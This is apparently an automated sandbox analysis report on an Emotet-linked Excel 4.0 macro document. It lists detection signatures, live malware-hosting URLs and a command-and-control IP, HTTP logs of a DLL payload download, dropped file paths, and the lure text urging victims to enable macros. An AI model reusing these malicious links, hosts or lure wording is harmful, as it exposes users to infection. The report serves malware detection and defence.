Windows Analysis Report
imedpub_8.xls

Overview

General Information

Sample Name:	imedpub_8.xls
Analysis ID:	562400
MD5:	e5e714cb6407688c4d57a5ac96c09047
SHA1:	8f46f78706d2530efb3e8b2fb843bf7baef60cab
SHA256:	a62bbd0c4dd80047a998ef3fe2670658ee890ffed8ad7775539967b665e2d001
Tags:	SilentBuilderxls
Infos:

Detection

Hidden Macro 4.0 Emotet

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Multi AV Scanner detection for submitted file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Yara detected Emotet

Antivirus detection for URL or domain

Found malicious Excel 4.0 Macro

Sigma detected: Windows Shell File Write to Suspicious Folder

Sigma detected: Suspicious MSHTA Process Patterns

Document contains OLE streams with names of living off the land binaries

Sigma detected: Microsoft Office Product Spawning Windows Shell

Sigma detected: Suspicious PowerShell Command Line

Powershell drops PE file

Sigma detected: MSHTA Spawning Windows Shell

Found Excel 4.0 Macro with suspicious formulas

Machine Learning detection for dropped file

Sigma detected: Mshta Spawning Windows Shell

Document exploit detected (process start blacklist hit)

Queries the volume information (name, serial number etc) of a device

Yara signature match

Drops PE files to the application program directory (C:\ProgramData)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Found dropped PE file which has not been started or loaded

Potential document exploit detected (performs DNS queries)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Downloads executable code via HTTP

Document misses a certain OLE stream usually present in this Microsoft Office document type

Enables debug privileges

Found a hidden Excel 4.0 Macro sheet

Potential document exploit detected (unknown TCP traffic)

PE file contains an invalid checksum

Searches for the Microsoft Outlook file path

Drops PE files

Uses a known web browser user agent for HTTP communication

Yara detected Xls With Macro 4.0

Creates a window with clipboard capturing capabilities

Document contains embedded VBA macros

Potential document exploit detected (performs HTTP gets)

Creates a process in suspended mode (likely to inject code)

Classification

Signatures

AV Detection

Multi AV Scanner detection for submitted file

Source: imedpub_8.xls

ReversingLabs: Detection: 16%

Antivirus detection for URL or domain

Source: http://maxtdeveloper.com/okw9yx/	Avira URL Cloud: Label: malware
Source: http://gardeningfilm.com/wp-content/pcMVUYDQ3q/	Avira URL Cloud: Label: malware
Source: http://it-o.biz/bitrix/xoDdDe/PE3	Avira URL Cloud: Label: malware
Source: http://www.inablr.com/elenctic/f	Avira URL Cloud: Label: malware
Source: http://totalplaytuxtla.com/sitio/DgktL3zd/PE3	Avira URL Cloud: Label: malware
Source: http://hostfeeling.com/wp-admin/	Avira URL Cloud: Label: malware
Source: http://gardeningfilm.com/wp-content/pcMVUYDQ3q/PE3	Avira URL Cloud: Label: malware
Source: https://property-eg.com/mlzkir/97v/	Avira URL Cloud: Label: malware
Source: http://91.240.118.172/gg/ff/fe.png	Avira URL Cloud: Label: malware
Source: http://maxtdeveloper.com/okw9yx/Gc28ZX/PE3	Avira URL Cloud: Label: malware
Source: http://bimesarayenovin.ir/wp-adm	Avira URL Cloud: Label: malware
Source: http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/	Avira URL Cloud: Label: malware
Source: http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/	Avira URL Cloud: Label: malware
Source: http://hostfeeling.com	Avira URL Cloud: Label: malware
Source: http://daisy.sukoburu-secure.com	Avira URL Cloud: Label: malware
Source: http://jurnalpjf.lan.go.id/assets/iM/	Avira URL Cloud: Label: malware
Source: http://activetraining.sytes.net/	Avira URL Cloud: Label: malware
Source: http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/PE3	Avira URL Cloud: Label: malware
Source: https://gudangtasorichina.com/wp-content/GG01c/PE3	Avira URL Cloud: Label: malware
Source: http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/PE3	Avira URL Cloud: Label: malware
Source: https://property-eg.com/mlzkir/97v/PE3	Avira URL Cloud: Label: malware
Source: http://daisy.sukoburu-secure.com/8plks/v8lyZTe/	Avira URL Cloud: Label: malware
Source: https://property-eg.com/mlzkir/9	Avira URL Cloud: Label: malware
Source: http://activetraining.sytes.net/libraries/8s/PE3	Avira URL Cloud: Label: malware
Source: http://maxtdeveloper.com/okw9yx/Gc28ZX/	Avira URL Cloud: Label: malware
Source: http://it-o.biz/bitrix/xoDdDe/	Avira URL Cloud: Label: malware
Source: https://gudangtasorichina.com/wp-content/GG01c/	Avira URL Cloud: Label: malware
Source: http://totalplaytuxtla.com/sitio/DgktL3zd/	Avira URL Cloud: Label: malware
Source: http://activetraining.sytes.net/libraries/8s/	Avira URL Cloud: Label: malware
Source: http://gardeningfilm.com/wp-cont	Avira URL Cloud: Label: malware
Source: http://jurnalpjf.lan.go.id/assets/iM/PE3	Avira URL Cloud: Label: malware
Source: http://bimesarayenovin.ir/wp-admin/G1pYGL/PE3	Avira URL Cloud: Label: malware
Source: http://bimesarayenovin.ir/wp-admin/G1pYGL/	Avira URL Cloud: Label: malware
Source: http://daisy.sukoburu-secure.com/8plks/v8lyZTe/PE3	Avira URL Cloud: Label: malware
Source: http://91.240.118.172/gg/ff/fe.html	Avira URL Cloud: Label: malware

Machine Learning detection for dropped file

Source: C:\ProgramData\JooSee.dll

Joe Sandbox ML: detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: wC:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.dll.pdb source: powershell.exe, 00000006.00000002.665123368.000000001C64E000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: m.Management.Automation.pdbpdbion.pdbProg source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: >ystem.pdb source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdbgement.Automation.pdbBBK source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.pdbE source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: anagsymbols\dll\System.pdb source: powershell.exe, 00000006.00000002.665123368.000000001C64E000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: `C:\Windows\System.pdb source: powershell.exe, 00000006.00000002.665123368.000000001C64E000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb8 source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\dll\System.pdben source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000006.00000002.665123368.000000001C64E000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.pdbSystem.pdbpdbtem.pdbm\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000006.00000002.665123368.000000001C64E000.00000004.00000010.00020000.00000000.sdmp

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\cmd.exe

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: hostfeeling.com

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 91.240.118.172:80

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 91.240.118.172:80

Networking

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic

Snort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.22:49166 -> 91.240.118.172:80

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: GLOBALLAYERNL GLOBALLAYERNL

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /gg/ff/fe.png HTTP/1.1Host: 91.240.118.172Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/iM/ HTTP/1.1Host: jurnalpjf.lan.go.idConnection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 164.90.147.135 164.90.147.135
Source: Joe Sandbox View	IP Address: 164.90.147.135 164.90.147.135
Source: Joe Sandbox View	IP Address: 91.240.118.172 91.240.118.172

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Jan 2022 19:58:55 GMTServer: Apache/2.4.6 (CentOS) PHP/7.4.27X-Powered-By: PHP/7.4.27Set-Cookie: 61f44affaa0ef=1643399935; expires=Fri, 28-Jan-2022 19:59:55 GMT; Max-Age=60; path=/Cache-Control: no-cache, must-revalidatePragma: no-cacheLast-Modified: Fri, 28 Jan 2022 19:58:55 GMTExpires: Fri, 28 Jan 2022 19:58:55 GMTContent-Disposition: attachment; filename="Fw6A4ZWhOBNhoQZNE5.dll"Content-Transfer-Encoding: binaryContent-Length: 548864Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 68 73 c2 61 2c 12 ac 32 2c 12 ac 32 2c 12 ac 32 ef 1d f3 32 26 12 ac 32 ef 1d f1 32 37 12 ac 32 2c 12 ad 32 0e 10 ac 32 0b d4 d1 32 36 12 ac 32 0b d4 c1 32 a6 12 ac 32 0b d4 c2 32 b2 12 ac 32 0b d4 d6 32 2d 12 ac 32 0b d4 d0 32 2d 12 ac 32 0b d4 d4 32 2d 12 ac 32 52 69 63 68 2c 12 ac 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 3e fa f3 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 50 04 00 00 00 04 00 00 00 00 00 06 0d 03 00 00 10 00 00 00 60 04 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 08 00 00 10 00 00 98 df 08 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 2d 05 00 52 00 00 00 34 10 05 00 04 01 00 00 00 a0 05 00 50 56 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 30 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 bd 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 60 04 00 94 05 00 00 ac 0f 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 39 45 04 00 00 10 00 00 00 50 04 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 92 cd 00 00 00 60 04 00 00 d0 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 80 65 00 00 00 30 05 00 00 30 00 00 00 30 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 56 02 00 00 a0 05 00 00 60 02 00 00 60 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 62 93 00 00 00 00 08 00 00 a0 00 00 00 c0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$hsa,2,2,2

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /gg/ff/fe.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.240.118.172Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172

Source: mshta.exe, 00000004.00000003.434549077.000000000036C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.436353034.000000000036C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.410082336.000000000036C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.432177164.000000000036C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: /moc.nideknil.wwwwww.linkedin.comi equals www.linkedin.com (Linkedin)
Source: mshta.exe, 00000004.00000003.434549077.000000000036C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.436353034.000000000036C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.410082336.000000000036C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.432177164.000000000036C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)

Source: powershell.exe, 00000006.00000002.663377488.00000000036F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.240.11
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.663377488.00000000036F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.240.118.172
Source: mshta.exe, 00000004.00000002.436317655.000000000033E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.410097515.0000000000380000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.240.118.172/gg/ff/fe.html
Source: imedpub_8.xls.0.dr	String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlB
Source: mshta.exe, 00000004.00000002.436281987.0000000000300000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlWinSta0
Source: mshta.exe, 00000004.00000003.412420079.000000000285D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlfunction
Source: mshta.exe, 00000004.00000003.411930557.0000000002855000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlhttp://91.240.118.172/gg/ff/fe.html
Source: mshta.exe, 00000004.00000002.436281987.0000000000300000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlmshta
Source: mshta.exe, 00000004.00000002.436317655.000000000033E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlngs
Source: mshta.exe, 00000004.00000002.436317655.000000000033E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlr
Source: powershell.exe, 00000006.00000002.663377488.00000000036F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.240.118.172/gg/ff/fe.p
Source: powershell.exe, 00000006.00000002.663377488.00000000036F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.240.118.172/gg/ff/fe.png
Source: powershell.exe, 00000006.00000002.663377488.00000000036F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.240.118.172/gg/ff/fe.pngPE3
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://activetraining.sytes.net/
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://activetraining.sytes.net/libraries/8s/
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://activetraining.sytes.net/libraries/8s/PE3
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://bimesarayenovin.ir/wp-adm
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://bimesarayenovin.ir/wp-admin/G1pYGL/
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://bimesarayenovin.ir/wp-admin/G1pYGL/PE3
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://daisy.suk
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://daisy.sukoburu-secure.com
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://daisy.sukoburu-secure.com/8plks/v8lyZTe/
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://daisy.sukoburu-secure.com/8plks/v8lyZTe/PE3
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://gardeningfilm.com/wp-cont
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://gardeningfilm.com/wp-content/pcMVUYDQ3q/
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://gardeningfilm.com/wp-content/pcMVUYDQ3q/PE3
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://hostfeeling.com
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://hostfeeling.com/wp-admin/
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/PE3
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://it-o.biz/
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://it-o.biz/bitrix/xoDdDe/
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://it-o.biz/bitrix/xoDdDe/PE3
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://jurnalpjf.lan.go.id
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://jurnalpjf.lan.go.id/asset
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://jurnalpjf.lan.go.id/assets/iM/
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://jurnalpjf.lan.go.id/assets/iM/PE3
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://maxtdeveloper.com/okw9yx/
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://maxtdeveloper.com/okw9yx/Gc28ZX/
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://maxtdeveloper.com/okw9yx/Gc28ZX/PE3
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://totalplaytuxtla.com/sitio
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://totalplaytuxtla.com/sitio/DgktL3zd/
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://totalplaytuxtla.com/sitio/DgktL3zd/PE3
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.inablr.com/elenctic/f
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/PE3
Source: powershell.exe, 00000006.00000002.661371984.00000000000C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: mshta.exe, 00000004.00000003.410185425.000000000310D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.436631636.00000000030E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.protware.com
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gudangtasorichina.com/wp
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gudangtasorichina.com/wp-content/GG01c/
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gudangtasorichina.com/wp-content/GG01c/PE3
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://property-eg.com/mlzkir/9
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://property-eg.com/mlzkir/97v/
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://property-eg.com/mlzkir/97v/PE3

Source: C:\Windows\System32\mshta.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fe[1].htm

Jump to behavior

Source: unknown

DNS traffic detected: queries for: hostfeeling.com

Source: global traffic	HTTP traffic detected: GET /gg/ff/fe.html HTTP/1.1Accept: /Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.240.118.172Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /gg/ff/fe.png HTTP/1.1Host: 91.240.118.172Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/iM/ HTTP/1.1Host: jurnalpjf.lan.go.idConnection: Keep-Alive

Key, Mouse, Clipboard, Microphone and Screen Capturing

Creates a window with clipboard capturing capabilities

Source: C:\Windows\System32\mshta.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

E-Banking Fraud

Yara detected Emotet

Source: Yara match

File source: C:\ProgramData\JooSee.dll, type: DROPPED

System Summary

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 4	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 30 31
Source: Screenshot number: 4	Screenshot OCR: DOCUMENT IS PROTECTED. 10 11 12 13 Previewing is not available for protected documents. 14 15
Source: Screenshot number: 4	Screenshot OCR: protected documents. 14 15 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
Source: Screenshot number: 4	Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 30 31 32 33 34 35 36 3
Source: Document image extraction number: 0	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0	Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 0	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0	Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1	Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1	Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Screenshot number: 8	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22 C
Source: Screenshot number: 8	Screenshot OCR: DOCUMENT IS PROTECTED. 10 11 12 13 Previewing is not available for protected documents. 14 15
